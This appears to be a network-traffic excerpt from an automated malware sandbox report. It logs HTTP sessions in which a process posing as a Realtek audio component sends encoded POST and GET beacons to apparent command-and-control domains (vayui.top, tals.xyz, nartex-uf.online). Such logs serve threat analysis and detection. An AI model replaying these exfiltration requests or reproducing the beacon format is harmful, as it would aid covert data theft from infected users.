                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 74 33 48 6b 4f 47 50 30 56 6f 33 51 34 73 55 4e 43 39 6e 59 69 7a 73 79 72 43 69 48 36 37 4f 58 43 51 4c 41 34 4f 2f 4f 71 37 43 47 4e 49 2f 6c 53 79 75 5a 43 35 38 62 35 77 75 31 51 72 44 2f 45 79 53 37 34 61 63 6a 4a 37 36 44 47 49 77 76 66 4a 47 4e 43 61 58 39 59 31 4a 68 75 64 64 46 72 6f 57 34 62 4c 6e 68 4b 63 77 69 4e 4f 39 76 53 63 74 73 31 56 30 55 48 42 4b 6e 31 50 56 55 73 52 32 74 53 43 36 48 31 6c 78 34 6c 57 73 58 4d 43 64 66 6f 4e 5a 72 56 76 55 54 56 43 32 58 33 2b 31 2b 5a 77 39 73 4a 37 69 45 44 41 3d
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhht3HkOGP0Vo3Q4sUNC9nYizsyrCiH67OXCQLA4O/Oq7CGNI/lSyuZC58b5wu1QrD/EyS74acjJ76DGIwvfJGNCaX9Y1JhuddFroW4bLnhKcwiNO9vScts1V0UHBKn1PVUsR2tSC6H1lx4lWsXMCdfoNZrVvUTVC2X3+1+Zw9sJ7iEDA=
                                                                                Nov 25, 2024 11:57:44.894789934 CET875INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:44 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rW0Y8xbgpcUmH5YdZfgzYjN9Hl3tRSoydkmHgvKo%2FjhuxFVdUZznlZ3Kq0t273M40EM7JfTgz7JijBqwsYvg8kUSaVok3z7zE0T0Nd0LUnbEe%2BBPTduAZQDaadmt3kpr"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811e9e7bdf7cfc-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                Nov 25, 2024 11:57:44.894800901 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.11.2049745172.67.145.234807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:47.287607908 CET2578OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 73 50 48 6b 34 4b 50 6d 6d 77 33 52 34 73 55 4f 43 39 6d 59 69 7a 68 79 72 61 6d 48 36 2f 77 58 41 6f 4c 50 36 47 2f 49 62 37 43 54 64 49 2f 6e 53 79 72 45 79 34 6b 62 34 41 71 31 51 37 44 2f 45 79 53 37 39 57 63 6b 62 54 36 51 32 49 33 75 66 4a 43 4a 43 61 2f 39 59 64 2f 68 75 49 6f 47 62 49 57 35 37 62 6e 6e 34 6b 77 67 74 4f 2f 75 53 63 31 73 31 6f 30 55 48 64 73 6e 77 61 41 55 76 78 32 76 44 6d 35 55 41 46 77 38 6a 4f 63 64 75 61 45 52 49 52 65 6b 7a 4b 30 54 6e 6d 68 57 33 72 68 77 59 59 65 37 72 54 4b 56 33 45 67 5a 55 50 48 51 2b 66 34 4a 45 6a 50 57 56 34 6e 6f 62 69 49 6d 44 53 4a 74 49 58 73 69 31 49 44 33 56 38 72 55 38 61 36 4d 71 67 6a 61 43 45 71 37 73 72 55 67 52 6c 49 6b 72 42 30 53 76 6d 61 6b 32 38 6a 53 71 6c 38 61 68 6b 44 73 45 6f 74 6b 61 56 6e 6d 78 36 4e 71 4d 4d 33 2f 66 2b 33 71 38 62 73 73 6d 33 6f 45 39 75 59 78 56 58 6d 4b 72 4f 4f [TRUNCATED]
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhhsPHk4KPmmw3R4sUOC9mYizhyramH6/wXAoLP6G/Ib7CTdI/nSyrEy4kb4Aq1Q7D/EyS79WckbT6Q2I3ufJCJCa/9Yd/huIoGbIW57bnn4kwgtO/uSc1s1o0UHdsnwaAUvx2vDm5UAFw8jOcduaERIRekzK0TnmhW3rhwYYe7rTKV3EgZUPHQ+f4JEjPWV4nobiImDSJtIXsi1ID3V8rU8a6MqgjaCEq7srUgRlIkrB0Svmak28jSql8ahkDsEotkaVnmx6NqMM3/f+3q8bssm3oE9uYxVXmKrOObA5iEGlygopdYA9v1omvejoQCbTulyXECk/gKl26XwR6WjuSqAl8ZlU3Fwc79CvF9D4aNN/3t9gBKlaVuBFTaDDdR9+krZcVrccQa7NRUD53HG/JZR0rGmoLHV59absSBUrUbKonsjRKV0V9yVRWb6cqeiwcJ9Nx5QtJbU65jgOyoVHkYgKyXQg7/S1b+1tI01RyD5zBKHp9GsDrxsh8asfQxB0bhcAaqHIXS1iLwaJvpA+bSW7hKKIu3r5mgtDx5ic41mRbE/fzOkVxBm2Kqe+LaYq4dNOex/o/ViL/k3+SUZmNJyZ1/9O3FEhpE6z50I1IEF7P3V11/1ZfQiWGXZ6vpQWT6jG+SCpu3fz6DlLiZwWUNGrSTbpXAxl7v15bVqnsJ/Be0ETiUAe/w1bOzWa8m0XsT4Uspuql6WWTXCGbYg4J50iLpeS0cCsnvNdfcLpgr+lTWwu1GR3Y0Vcam0lZBjp3BZzJ16ShmDwUtM00LnvrjsPxqlXanSvkBAxMWaq4T9Gsg4g4O9hZZf2sYNVvC9I4nVvQCvYxkklApuNdp0sH1/srYSKyu/2/8Vol/GoCnueK1PorYn+YCce64tAmJAxheiJIiB/pbrGWqRjnwWP66qKpv5Wh6KJB4xB7T417Tu1iQ8jahhjeHGzz1GJuQJWnBoCoIR [TRUNCATED]
                                                                                Nov 25, 2024 11:57:47.287688017 CET5300OUTData Raw: 31 2b 42 38 68 30 62 6a 37 68 4e 45 36 4c 79 79 79 66 41 4f 46 6f 68 53 33 72 64 38 33 6c 54 58 55 46 73 61 58 77 6f 64 47 58 4b 6b 75 46 53 37 6a 57 64 31 36 78 4b 68 37 43 34 45 78 63 63 68 78 7a 77 53 66 6d 76 6e 76 4c 6c 2b 4b 45 47 69 77 64
                                                                                Data Ascii: 1+B8h0bj7hNE6LyyyfAOFohS3rd83lTXUFsaXwodGXKkuFS7jWd16xKh7C4ExcchxzwSfmvnvLl+KEGiwdpGgkISWGsXVBiszjq8a/Ktb8FwdH/vm99iAPS7O8mjsQyVFMXiNBHWOn7fyRrhX0xvuWwTON9x43ibo7Dh5HMclffS1+L86lXdYOXg0lI0z7qR+QajtBSNwAADKAV5ErhWY30CVlSJwPxVtw31vR/OTlC9ZkPLZFv
                                                                                Nov 25, 2024 11:57:47.525825977 CET874INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:47 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEsP6jJOsaZ4UcO2QBFwlE78G0mqDg5EToieOys4eVQZKhtYIq2MocKj2XfAk5IbfpOlJ5l4oS7djY%2BwpMx1plkyNmCc2L2pl6pXV1hlZdgm1BcpFFFk5YRX53OaJdUu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811eaedec8729b-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97841&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                Nov 25, 2024 11:57:47.525876999 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.11.2049746172.67.145.234807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:49.910576105 CET451OUTGET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:57:50.160717010 CET886INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:57:50 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lcKpuNuvD79J%2FgwQVB9l7KrOarVNBtdPXlsLOf0DbGn8RdODJk8wi2LAQmbjGcma9RmB5cCBFOvIGhDVC1w4w5EhrwZSWJu9ffHCnupNG8tPjls0IsjK2keSTUzDLEC7"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e811ebf3f8641de-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97340&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                Nov 25, 2024 11:57:50.160768032 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.11.204974713.248.169.48807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:55.391695023 CET706OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 62 51 65 54 69 6b 31 38 54 67 49 48 58 79 70 52 6a 58 65 39 42 61 63 38 4b 77 78 38 71 34 54 45 76 78 4a 6d 70 6b 50 75 52 4d 59 71 47 50 6a 42 39 49 44 41 2b 63 6c 41 62 63 32 36 71 54 48 59 49 4c 48 41 64 57 48 33 45 70 4b 77 30 72 78 48 50 61 38 75 78 59 74 64 50 31 54 51 46 61 79 4b 55 33 66 4c 4d 43 67 70 38 37 55 42 64 50 32 47 31 2f 52 62 58 4c 4b 64 43 67 54 74 77 77 4f 75 2b 37 65 47 46 6f 48 35 73 4b 54 46 58 6f 68 6e 6d 45 69 61 63 36 6b 6f 74 73 6f 32 63 69 64 51 72 31 6f 36 38 57 73 61 4e 59 44 4c 64 6c 6c 64 73 57 6a 51 77 67 3d 3d
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVbQeTik18TgIHXypRjXe9Bac8Kwx8q4TEvxJmpkPuRMYqGPjB9IDA+clAbc26qTHYILHAdWH3EpKw0rxHPa8uxYtdP1TQFayKU3fLMCgp87UBdP2G1/RbXLKdCgTtwwOu+7eGFoH5sKTFXohnmEiac6kotso2cidQr1o68WsaNYDLdlldsWjQwg==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.11.204974813.248.169.48807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:57:58.027862072 CET726OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 4a 42 75 54 67 44 68 38 55 41 49 45 4a 69 70 52 71 33 65 68 42 61 51 38 4b 78 31 73 70 4b 33 45 75 56 4e 6d 6f 67 6a 75 57 4d 59 71 4f 76 6a 45 35 49 44 39 2b 63 6f 39 62 5a 57 36 71 54 54 59 49 50 44 41 64 68 54 32 43 70 4b 79 74 37 78 5a 51 4b 38 75 78 59 74 64 50 31 58 36 46 61 4b 4b 55 45 58 4c 4d 6a 67 71 2f 37 55 41 4d 50 32 47 2f 66 52 48 58 4c 4b 2f 43 6c 75 6c 77 79 47 75 2b 36 75 47 45 38 54 36 31 36 54 44 61 49 67 46 74 56 58 34 53 4f 63 47 38 73 45 51 56 58 52 77 71 6a 6c 67 68 6b 59 2b 4f 4c 66 35 5a 56 63 31 75 55 69 4c 74 72 37 79 33 6b 35 36 6e 2b 56 68 34 4f 6c 42 74 39 6c 4b 4c 42 38 3d
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVJBuTgDh8UAIEJipRq3ehBaQ8Kx1spK3EuVNmogjuWMYqOvjE5ID9+co9bZW6qTTYIPDAdhT2CpKyt7xZQK8uxYtdP1X6FaKKUEXLMjgq/7UAMP2G/fRHXLK/ClulwyGu+6uGE8T616TDaIgFtVX4SOcG8sEQVXRwqjlghkY+OLf5ZVc1uUiLtr7y3k56n+Vh4OlBt9lKLB8=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.11.204974913.248.169.48807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:00.668463945 CET2578OUTPOST /tj5o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Origin: http://www.tals.xyz
                                                                                Referer: http://www.tals.xyz/tj5o/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 42 6a 75 6a 69 6d 72 4e 4b 69 69 56 4a 42 75 54 67 44 68 38 55 41 49 45 4a 69 70 52 71 33 65 68 42 61 51 38 4b 78 31 73 70 4b 2f 45 75 6d 56 6d 6f 42 6a 75 58 4d 59 71 50 76 6a 46 35 49 44 61 2b 63 78 36 62 5a 53 4d 71 56 66 59 49 71 58 41 62 56 2f 32 58 5a 4b 79 77 72 78 59 50 61 38 65 78 62 45 31 50 31 48 36 46 61 4b 4b 55 46 6e 4c 4c 79 67 71 7a 62 55 42 64 50 32 43 31 2f 52 6a 58 4b 6a 49 43 6b 61 31 7a 44 6d 75 2b 61 2b 47 47 4b 76 36 71 4b 54 42 55 6f 67 6a 74 56 4c 4f 53 4f 6f 30 38 73 67 75 56 51 31 77 6f 58 51 57 35 46 59 63 54 59 4c 72 53 6d 45 56 68 55 71 76 6c 38 50 38 39 55 56 39 6b 71 38 31 6b 63 5a 76 30 39 6b 4e 5a 68 46 2f 6b 4f 55 51 41 64 76 48 6b 6a 43 74 49 7a 6b 6e 6a 33 4a 73 33 5a 37 4f 45 4d 71 35 77 66 6b 57 35 2b 51 75 6c 78 51 44 41 57 72 37 47 35 71 68 67 35 6d 32 43 50 55 42 65 56 37 76 65 43 51 35 53 78 42 76 69 63 6e 58 43 2b 72 6c 77 4f 78 61 58 38 69 76 51 33 69 4c 53 46 6d 36 43 6b 65 74 33 49 2f 55 4a 2f 77 76 6f 78 64 32 48 79 57 55 67 67 42 2b [TRUNCATED]
                                                                                Data Ascii: 2WLcH=BjujimrNKiiVJBuTgDh8UAIEJipRq3ehBaQ8Kx1spK/EumVmoBjuXMYqPvjF5IDa+cx6bZSMqVfYIqXAbV/2XZKywrxYPa8exbE1P1H6FaKKUFnLLygqzbUBdP2C1/RjXKjICka1zDmu+a+GGKv6qKTBUogjtVLOSOo08sguVQ1woXQW5FYcTYLrSmEVhUqvl8P89UV9kq81kcZv09kNZhF/kOUQAdvHkjCtIzknj3Js3Z7OEMq5wfkW5+QulxQDAWr7G5qhg5m2CPUBeV7veCQ5SxBvicnXC+rlwOxaX8ivQ3iLSFm6Cket3I/UJ/wvoxd2HyWUggB+wTTR0gWYVpHgj0To4LW2oUVpnHGG9/b63WrOWoM6ygN/BvNB1K+DSSLs2D9+uyimjNdkcpCiFyELVYtGcin8pO0RO7IVouW5IXpV3RzoZ4egYtNoRMQirw4WTor0KOQBghaPCRVhT5HoOij5SgCarYHi1JgjnmsJVB+bShqR++vDl80geymE+iVIVymWnw2vjIjY4c2agFAQO8/QuFDFPxGYPzaffGsCNsjmCVJDGCA2+7w9MnK4Z/0whly6NYoLT6QP+8C6xqVz/KX3wT7CzLDzit9UowPZBfoUJfxVLmOO9Lfw28Kunqvl7NhIneAjbUz0V91jFOeRMEFaHcnRBfwPXncNDPEYk9o1S9xkUhd4kMAiuM2laQZh9/f0GYZKE8U+q5U2CVJNxFyAOqSbNZdc06mNx72uDDKZY28B0GeRuoZr7b0cLli9yhCX8K3LilmyOpwsNAu5Ldo85q/QaL92/8PcLVwHxBEGmCe6PLfOfacQ1VVjRI8Fpt7WR0fLE7foP5WP7J5YzjIz5CUx8I9AUynbPAHnUH2GyUIVv3hY+Ij3GqzleSpxSuM6swmEGnS7F+IaflfNJruyULJ3QvTls80E+iApsQ9zhmU8Dd7ot9DlYirGbjz4MJLvpYWMY9RtI5bdtJzafZJS/yqyPKJDcpcO+icmsz [TRUNCATED]
                                                                                Nov 25, 2024 11:58:00.668545008 CET5297OUTData Raw: 66 64 50 4b 67 5a 51 56 44 61 6d 75 56 65 53 71 71 71 54 37 63 39 59 4b 37 48 5a 7a 4a 5a 31 52 76 6a 4b 54 46 31 7a 77 55 6d 58 4a 4f 33 2b 38 6f 74 36 70 6f 4a 4f 58 35 78 55 33 71 68 4d 45 66 73 4c 34 41 4e 69 75 7a 74 50 35 42 74 6b 54 79 62
                                                                                Data Ascii: fdPKgZQVDamuVeSqqqT7c9YK7HZzJZ1RvjKTF1zwUmXJO3+8ot6poJOX5xU3qhMEfsL4ANiuztP5BtkTybPnYyBUDFLpLKHpMsCD//ByIrjPwz3RlxnIy0cleO6KYhpH9f8mAif2Ccseggub51WSRDtyrZQDqGvlevNCblvzJDo4S+1J/9jbx6aruoTtjtXzxQ3/vLkwvYOZdCBu5nU9NVwPJ4TQYvH82a+KAFV3Xr+VsRV7S9k


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.11.204975013.248.169.48807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:03.306689978 CET450OUTGET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.tals.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:03.411736965 CET394INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 10:58:03 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 51 3d 39 77 36 65 4f 75 61 79 4d 26 32 57 4c 63 48 3d 4d 68 47 44 68 54 4b 34 4b 52 6d 47 44 77 6e 4f 76 56 35 57 54 7a 34 69 49 52 4a 6d 6b 32 6d 38 49 61 74 69 43 6d 55 4a 67 71 53 46 6c 58 4a 67 72 52 69 4d 55 4d 39 4a 43 71 4c 44 77 5a 76 39 6d 4f 70 45 65 39 47 57 6d 41 4c 43 4b 71 4b 51 61 68 69 5a 56 59 37 79 37 5a 56 35 50 39 6b 43 74 5a 30 68 4e 48 54 5a 50 66 2b 73 42 78 47 50 46 53 70 34 6f 70 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.11.204975131.31.196.177807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:08.976408005 CET730OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 69 51 6f 76 67 55 6e 77 61 6a 52 4b 50 6b 48 6c 50 4c 75 4b 73 74 63 64 55 5a 65 77 2b 46 65 4f 50 52 62 4e 36 6b 54 55 32 4a 67 43 6d 70 72 67 4f 70 38 4d 4d 42 46 59 48 36 38 36 65 74 66 32 69 6b 45 34 59 6c 6c 45 54 43 35 5a 32 42 51 4a 67 72 64 56 4d 64 79 48 50 66 32 4b 4a 2f 76 47 69 62 59 2f 73 78 4c 30 50 67 64 30 54 42 64 6f 31 35 6c 52 46 54 5a 42 68 7a 55 66 37 49 71 49 6f 34 4d 51 5a 63 49 58 72 34 67 64 52 4c 4b 52 30 6d 5a 66 50 79 63 73 31 38 47 39 79 53 32 43 72 6a 2b 6f 31 44 42 6b 55 52 38 7a 48 38 68 34 2f 61 70 58 6a 41 3d 3d
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJiQovgUnwajRKPkHlPLuKstcdUZew+FeOPRbN6kTU2JgCmprgOp8MMBFYH686etf2ikE4YllETC5Z2BQJgrdVMdyHPf2KJ/vGibY/sxL0Pgd0TBdo15lRFTZBhzUf7IqIo4MQZcIXr4gdRLKR0mZfPycs18G9yS2Crj+o1DBkUR8zH8h4/apXjA==
                                                                                Nov 25, 2024 11:58:09.222405910 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:09 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
